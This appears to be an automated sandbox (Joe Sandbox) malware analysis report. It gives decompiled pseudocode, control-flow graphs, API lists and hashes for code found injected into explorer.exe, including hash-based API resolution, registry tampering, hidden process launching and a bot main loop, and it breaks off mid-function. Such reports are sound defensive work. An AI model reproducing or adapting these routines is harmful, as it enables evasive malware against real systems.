                              • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001FC), ref: 0008C35F
                            • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                            • String ID:
                            • API String ID: 2389948835-0
                            • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                            • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 384 861b4-861f9 memset call 88604 387 861ff-86211 call 88604 384->387 388 86363-86369 384->388 387->388 391 86217-86234 RegOpenKeyExW 387->391 392 8623a-8626d 391->392 393 86333-86337 391->393 398 8627f-86284 392->398 399 8626f-8627a 392->399 394 86339-8633e 393->394 395 86344-8635b call 8861a * 2 393->395 394->395 403 86360 395->403 398->393 401 8628a 398->401 399->393 405 8628d-862dc memset * 2 401->405 403->388 407 862de-862ee 405->407 408 86326-8632d 405->408 410 862f0-86304 407->410 411 86323 407->411 408->393 408->405 410->411 413 86306-86313 call 8c392 410->413 411->408 416 8631c-8631e call 8b1b1 413->416 417 86315-86317 413->417 416->411 417->416
                            C-Code - Quality: 80%
                            			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				void* _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				char _v24;
                            				char _v28;
                            				void* _v32;
                            				void* _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v56;
                            				void _v576;
                            				intOrPtr _t63;
                            				intOrPtr _t72;
                            				intOrPtr _t80;
                            				intOrPtr _t81;
                            				intOrPtr _t82;
                            				signed int _t85;
                            				intOrPtr _t87;
                            				int _t89;
                            				intOrPtr _t90;
                            				intOrPtr _t92;
                            				void* _t96;
                            				void* _t97;
                            				void* _t98;
                            				void* _t99;
                            				void* _t100;
                            				void* _t108;
                            
                            				_t108 = __fp0;
                            				_t96 = __edx;
                            				_t89 = 0;
                            				_v8 = 0;
                            				memset( &_v576, 0, 0x208);
                            				_v28 = 0x104;
                            				_v20 = 0x3fff;
                            				_v16 = 0;
                            				_t98 = E00088604(0x3fff);
                            				_t100 = _t99 + 0x10;
                            				_v32 = _t98;
                            				if(_t98 == 0) {
                            					L18:
                            					return 0;
                            				}
                            				_t97 = E00088604(0x800);
                            				_v36 = _t97;
                            				if(_t97 == 0) {
                            					goto L18;
                            				}
                            				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                            					L15:
                            					if(_v8 != 0) {
                            						_t63 =  *0x9e68c; // 0xc2fab8
                            						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                            					}
                            					E0008861A( &_v32, 0x3fff); // executed
                            					E0008861A( &_v36, 0x800); // executed
                            					goto L18;
                            				}
                            				_push( &_v56);
                            				_push( &_v40);
                            				_push( &_v44);
                            				_push( &_v48);
                            				_push( &_v24);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push( &_v28);
                            				_push( &_v576);
                            				_t72 =  *0x9e68c; // 0xc2fab8
                            				_push(_v8);
                            				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                            					__eflags = _v24;
                            					if(_v24 == 0) {
                            						goto L15;
                            					}
                            					_v12 = 0;
                            					do {
                            						memset(_t97, 0, 0x800);
                            						memset(_t98, 0, 0x3fff);
                            						_t100 = _t100 + 0x18;
                            						_v20 = 0x3fff;
                            						_v16 = 0x800;
                            						 *_t98 = 0;
                            						_t80 =  *0x9e68c; // 0xc2fab8
                            						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                            						__eflags = _t81;
                            						if(_t81 == 0) {
                            							_t82 =  *0x9e690; // 0xc2fb90
                            							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                            							__eflags = _t90;
                            							if(_t90 != 0) {
                            								_t92 =  *0x9e68c; // 0xc2fab8
                            								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                            								__eflags = _a16;
                            								if(_a16 != 0) {
                            									_t85 = E0008C392(_t90);
                            									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                            									if(__eflags == 0) {
                            										__eflags = 0;
                            										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                            									}
                            									E0008B1B1(_t90, _t96, __eflags, _t108);
                            								}
                            							}
                            							_t89 = _v12;
                            						}
                            						_t89 = _t89 + 1;
                            						_v12 = _t89;
                            						__eflags = _t89 - _v24;
                            					} while (_t89 < _v24);
                            					goto L15;
                            				}
                            				_t87 =  *0x9e68c; // 0xc2fab8
                            				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                            				goto L15;
                            			}

                            APIs
                            • memset.MSVCRT ref: 000861D2
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                            • memset.MSVCRT ref: 00086295
                            • memset.MSVCRT ref: 000862A2
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$AllocateHeapOpen
                            • String ID:
                            • API String ID: 2508404634-0
                            • Opcode ID: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                            • Opcode Fuzzy Hash: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 419 8a911-8a941 memset 420 8a94c-8a971 CreateProcessW 419->420 421 8a943-8a948 419->421 422 8a9ae 420->422 423 8a973-8a976 420->423 421->420 424 8a9b0-8a9b6 422->424 425 8a978-8a988 423->425 426 8a996-8a9a6 CloseHandle 423->426 425->426 429 8a98a-8a990 GetExitCodeProcess 425->429 427 8a9ac 426->427 427->424 429->426
                            C-Code - Quality: 65%
                            			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                            				struct _PROCESS_INFORMATION _v20;
                            				struct _STARTUPINFOW _v92;
                            				signed int _t24;
                            				intOrPtr _t32;
                            				intOrPtr _t34;
                            				int _t42;
                            				WCHAR* _t44;
                            
                            				_t42 = 0x44;
                            				memset( &_v92, 0, _t42);
                            				_v92.cb = _t42;
                            				asm("stosd");
                            				_t44 = 1;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t24 = _a16;
                            				if(_t24 != 0) {
                            					_v92.dwFlags = 1;
                            					_v92.wShowWindow = 0;
                            				}
                            				asm("sbb eax, eax");
                            				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                            					_t44 = 0;
                            				} else {
                            					if(_a8 != 0) {
                            						_push(_a12);
                            						_t34 =  *0x9e684; // 0xc2f8f0
                            						_push(_v20.hProcess);
                            						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                            							GetExitCodeProcess(_v20.hProcess, _a8);
                            						}
                            					}
                            					CloseHandle(_v20.hThread);
                            					_t32 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                            				}
                            				return _t44;
                            			}

                            APIs
                            • memset.MSVCRT ref: 0008A925
                            • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                            • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
                            • CloseHandle.KERNELBASE(?), ref: 0008A99E
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseCodeCreateExitHandlememset
                            • String ID:
                            • API String ID: 2668540068-0
                            • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                            • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 430 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 433 8b07c-8b07e 430->433 434 8b0ab-8b0dd call 8c392 lstrcpynW 433->434 435 8b080-8b094 call 8bb8d 433->435 435->434 439 8b096-8b0a7 435->439 439->434
                            C-Code - Quality: 87%
                            			E0008B012(void* __ecx, WCHAR* __edx) {
                            				int _v8;
                            				void _v528;
                            				char _v1046;
                            				void _v1048;
                            				intOrPtr _t21;
                            				intOrPtr* _t26;
                            				void* _t27;
                            				intOrPtr _t33;
                            				intOrPtr _t36;
                            				void* _t39;
                            				intOrPtr _t40;
                            				WCHAR* _t47;
                            				void* _t49;
                            
                            				_t39 = __ecx;
                            				_v8 = 0x104;
                            				_t47 = __edx;
                            				memset( &_v1048, 0, 0x208);
                            				memset( &_v528, 0, 0x208);
                            				_t21 =  *0x9e698; // 0xc2fbc8
                            				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                            				_t49 = E0008B946(_t39);
                            				_t26 =  *0x9e6b8; // 0xc2fbd8
                            				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                            				if(_t27 == 0) {
                            					_t33 =  *0x9e688; // 0xb0000
                            					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                            						_t36 =  *0x9e698; // 0xc2fbc8
                            						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                            					}
                            				}
                            				_t40 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                            				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
                            				return 1;
                            			}

                            APIs
                            • memset.MSVCRT ref: 0008B037
                            • memset.MSVCRT ref: 0008B045
                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                              • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                              • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                              • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                            • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                            • String ID:
                            • API String ID: 3158470084-0
                            • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                            • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 442 8bf37-8bf66 RegOpenKeyExW 443 8bf68-8bf6a 442->443 444 8bf6c-8bf8a RegQueryValueExW 442->444 445 8bfda-8bfdc 443->445 446 8bf8c-8bf9c call 88604 444->446 447 8bfc7-8bfca 444->447 446->447 453 8bf9e-8bfb8 RegQueryValueExW 446->453 449 8bfcc-8bfd1 447->449 450 8bfd7 447->450 449->450 452 8bfd9 450->452 452->445 454 8bfba-8bfc6 call 8861a 453->454 455 8bfdd-8bfea RegCloseKey 453->455 454->447 455->452
                            C-Code - Quality: 100%
                            			E0008BF37(short* __edx, short* _a4) {
                            				void* _v8;
                            				int _v12;
                            				int _v16;
                            				char* _v20;
                            				char* _t30;
                            				intOrPtr _t31;
                            				char* _t49;
                            
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                            					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                            						L6:
                            						if(_v8 != 0) {
                            							_t31 =  *0x9e68c; // 0xc2fab8
                            							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                            						}
                            						_t30 = 0;
                            						L9:
                            						return _t30;
                            					}
                            					_t49 = E00088604(_v12);
                            					_v20 = _t49;
                            					if(_t49 == 0) {
                            						goto L6;
                            					}
                            					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                            						RegCloseKey(_v8);
                            						_t30 = _t49;
                            						goto L9;
                            					}
                            					E0008861A( &_v20, 0xfffffffe);
                            					goto L6;
                            				}
                            				return 0;
                            			}

                            APIs
                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                            • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                            • Opcode Fuzzy Hash: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 458 8be9b-8bec3 RegOpenKeyExA 459 8bec9-8bee6 RegQueryValueExA 458->459 460 8bec5-8bec7 458->460 462 8bee8-8bef7 call 88604 459->462 463 8bf21-8bf24 459->463 461 8bf33-8bf36 460->461 462->463 468 8bef9-8bf13 RegQueryValueExA 462->468 465 8bf31 463->465 466 8bf26-8bf2e RegCloseKey 463->466 465->461 466->465 468->463 469 8bf15-8bf1a 468->469 469->463 470 8bf1c-8bf1f 469->470 470->463
                            C-Code - Quality: 100%
                            			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                            				void* _v8;
                            				int _v12;
                            				int _v16;
                            				intOrPtr* _t43;
                            				char* _t46;
                            
                            				_t46 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                            					return 0;
                            				}
                            				_v12 = 0;
                            				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                            					_t46 = E00088604(_v12 + 1);
                            					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                            						_t43 = _a12;
                            						if(_t43 != 0) {
                            							 *_t43 = _v12;
                            						}
                            					}
                            				}
                            				if(_v8 != 0) {
                            					RegCloseKey(_v8);
                            				}
                            				return _t46;
                            			}

                            APIs
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,00C2FC08,00000000,?,00000002), ref: 0008BEBE
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                            • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            Uniqueness

                            Uniqueness Score: -1.00%


                            C-Code - Quality: 78%
                            			E00085631(void* __edx, void* __edi) {
                            				char _v44;
                            				void* _t8;
                            				intOrPtr _t11;
                            				intOrPtr _t14;
                            				intOrPtr _t17;
                            				intOrPtr _t18;
                            				void* _t20;
                            				void* _t33;
                            				void* _t34;
                            				void* _t36;
                            				void* _t39;
                            				void* _t40;
                            				intOrPtr _t49;
                            				void* _t54;
                            
                            				_t54 = __edi;
                            				_t8 = E00089E66(0x3b); // executed
                            				if(_t8 != 0xffffffff) {
                            					L2:
                            					E0008980C(0x9e6c8);
                            					_t39 = 0x37; // executed
                            					E00089F06(_t39);
                            					_t11 =  *0x9e688; // 0xb0000
                            					_t40 = 0x3a; // executed
                            					E00089F06(_t40); // executed
                            					E0008E4C1(_t63);
                            					_t14 =  *0x9e688; // 0xb0000
                            					_t41 =  &_v44;
                            					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                            					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                            					_t17 =  *0x9e684; // 0xc2f8f0
                            					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
                            					 *0x9e74c = _t18;
                            					if(_t18 != 0) {
                            						_t20 = CreateMutexA(0, 0, 0);
                            						 *0x9e76c = _t20;
                            						__eflags = _t20;
                            						if(_t20 != 0) {
                            							_t34 = E00088604(0x1000);
                            							_t52 = 0;
                            							 *0x9e770 = _t34;
                            							_t49 =  *0x9e774; // 0x2
                            							__eflags = _t34;
                            							_t41 =  !=  ? 0 : _t49;
                            							 *0x9e774 =  !=  ? 0 : _t49; // executed
                            						}
                            						E0008153B(_t41, _t52); // executed
                            						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
                            						E00083017(); // executed
                            						E000831C2(0, __eflags); // executed
                            						E000829B1(); // executed
                            						E00083BB2(_t54, __eflags); // executed
                            						while(1) {
                            							__eflags =  *0x9e758; // 0x0
                            							if(__eflags != 0) {
                            								break;
                            							}
                            							E0008980C(0x9e750);
                            							_push(0x9e750);
                            							_push(0x9e750); // executed
                            							E0008279B();
                            							Sleep(0xfa0);
                            						}
                            						E00083D34();
                            						E00089A8E();
                            						E000834CB();
                            						_t33 = 0;
                            						__eflags = 0;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					_t36 = E00082DCB();
                            					_t63 = _t36;
                            					if(_t36 != 0) {
                            						L3:
                            						_t33 = 1;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				return _t33;
                            			}


















                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: ?xSa
                            • API String ID: 3249252070-2026721626
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008DFAD(void* __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v92;
                            				intOrPtr _t41;
                            				signed int _t47;
                            				signed int _t49;
                            				signed int _t51;
                            				void* _t56;
                            				struct HINSTANCE__* _t58;
                            				_Unknown_base(*)()* _t59;
                            				intOrPtr _t60;
                            				void* _t62;
                            				intOrPtr _t63;
                            				void* _t69;
                            				char _t70;
                            				void* _t75;
                            				CHAR* _t80;
                            				void* _t82;
                            
                            				_t75 = __ecx;
                            				_v12 = __edx;
                            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                            				if(_t41 == 0) {
                            					L4:
                            					return 0;
                            				}
                            				_t62 = _t41 + __ecx;
                            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                            				_t47 = 0;
                            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_v8 = 0;
                            				_v16 = _t63;
                            				if(_t63 == 0) {
                            					goto L4;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					L2:
                            					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                            					_t51 = _v8;
                            					if((_t49 ^ 0x218fe95b) == _v12) {
                            						break;
                            					}
                            					_t73 = _v20;
                            					_t47 = _t51 + 1;
                            					_v8 = _t47;
                            					if(_t47 < _v16) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                            					return _t80;
                            				} else {
                            					_t56 = 0;
                            					while(1) {
                            						_t70 = _t80[_t56];
                            						if(_t70 == 0x2e || _t70 == 0) {
                            							break;
                            						}
                            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                            						_t56 = _t56 + 1;
                            						if(_t56 < 0x40) {
                            							continue;
                            						}
                            						break;
                            					}
                            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                            					if( *((char*)(_t56 + _t80)) != 0) {
                            						_t80 =  &(( &(_t80[1]))[_t56]);
                            					}
                            					_t40 =  &_v92; // 0x6c6c642e
                            					_t58 = LoadLibraryA(_t40); // executed
                            					if(_t58 == 0) {
                            						goto L4;
                            					}
                            					_t59 = GetProcAddress(_t58, _t80);
                            					if(_t59 == 0) {
                            						goto L4;
                            					}
                            					return _t59;
                            				}
                            			}


























                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                            				void* _v8;
                            				int _v12;
                            				void* _v16;
                            				void* _v20;
                            				int _v24;
                            				void* _v28;
                            				char _v32;
                            				char _v36;
                            				int* _v40;
                            				int** _v44;
                            				void _v108;
                            				int* _t90;
                            				void* _t91;
                            				char* _t92;
                            				long _t96;
                            				int* _t97;
                            				intOrPtr _t98;
                            				int* _t101;
                            				long _t111;
                            				int* _t112;
                            				intOrPtr _t122;
                            				char* _t125;
                            				intOrPtr _t126;
                            				intOrPtr _t128;
                            				int* _t129;
                            				intOrPtr _t131;
                            				int* _t133;
                            				intOrPtr _t134;
                            				int* _t135;
                            				intOrPtr _t136;
                            				char* _t139;
                            				int _t143;
                            				int _t147;
                            				intOrPtr _t148;
                            				int* _t149;
                            				int* _t154;
                            				int** _t155;
                            				int* _t161;
                            				int* _t163;
                            				intOrPtr _t164;
                            				intOrPtr _t171;
                            				int _t176;
                            				char* _t177;
                            				char* _t178;
                            				char _t179;
                            				void* _t180;
                            				void* _t181;
                            				void* _t183;
                            
                            				_t176 = 0;
                            				_v24 = __edx;
                            				_t177 = 0;
                            				_v32 = __ecx;
                            				_v28 = 0;
                            				_v8 = 0x80000001;
                            				_v20 = 0;
                            				_t155 = E00088604(0x110);
                            				_v44 = _t155;
                            				if(_t155 != 0) {
                            					_t158 = _a4;
                            					_t155[0x42] = _a4;
                            					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                            					_t161 = _v108;
                            					__eflags = _t161 - 0x61 - 0x19;
                            					_t90 = _t161;
                            					if(_t161 - 0x61 <= 0x19) {
                            						_t90 = _t90 - 0x20;
                            						__eflags = _t90;
                            					}
                            					_v108 = _t90;
                            					_t91 = E000895C7(0x4d2);
                            					_t163 = _v24;
                            					_v16 = _t91;
                            					__eflags = _t163;
                            					if(_t163 == 0) {
                            						L16:
                            						_t164 =  *0x9e688; // 0xb0000
                            						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                            						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                            							_push(_t176);
                            							_push( &_v108);
                            							_push("\\");
                            							_t92 = E00089292(_t91);
                            							_t181 = _t181 + 0x10;
                            							L20:
                            							_t177 = _t92;
                            							_v20 = _t177;
                            							goto L21;
                            						}
                            						_v24 = _t176;
                            						_v8 = 0x80000003;
                            						_t122 =  *0x9e68c; // 0xc2fab8
                            						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                            						__eflags = _v24 - _t177;
                            						if(_v24 == _t177) {
                            							goto L21;
                            						}
                            						_push(_t176);
                            						_push( &_v108);
                            						_t125 = "\\";
                            						_push(_t125);
                            						_push(_v16);
                            						_push(_t125);
                            						_t92 = E00089292(_v24);
                            						_t181 = _t181 + 0x18;
                            						goto L20;
                            					} else {
                            						_t126 =  *0x9e688; // 0xb0000
                            						_t128 =  *0x9e68c; // 0xc2fab8
                            						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                            						__eflags = _t129;
                            						if(_t129 != 0) {
                            							_t91 = _v16;
                            							goto L16;
                            						}
                            						_v12 = _t176;
                            						_t131 =  *0x9e68c; // 0xc2fab8
                            						_v8 = 0x80000003;
                            						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                            						__eflags = _v12 - _t177;
                            						if(_v12 == _t177) {
                            							L21:
                            							E000885C2( &_v16);
                            							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                            							__eflags = _t96;
                            							if(_t96 == 0) {
                            								_t97 = _a8;
                            								__eflags = _t97;
                            								if(_t97 != 0) {
                            									 *_t97 = 1;
                            								}
                            								_push(_v28);
                            								L30:
                            								_t98 =  *0x9e68c; // 0xc2fab8
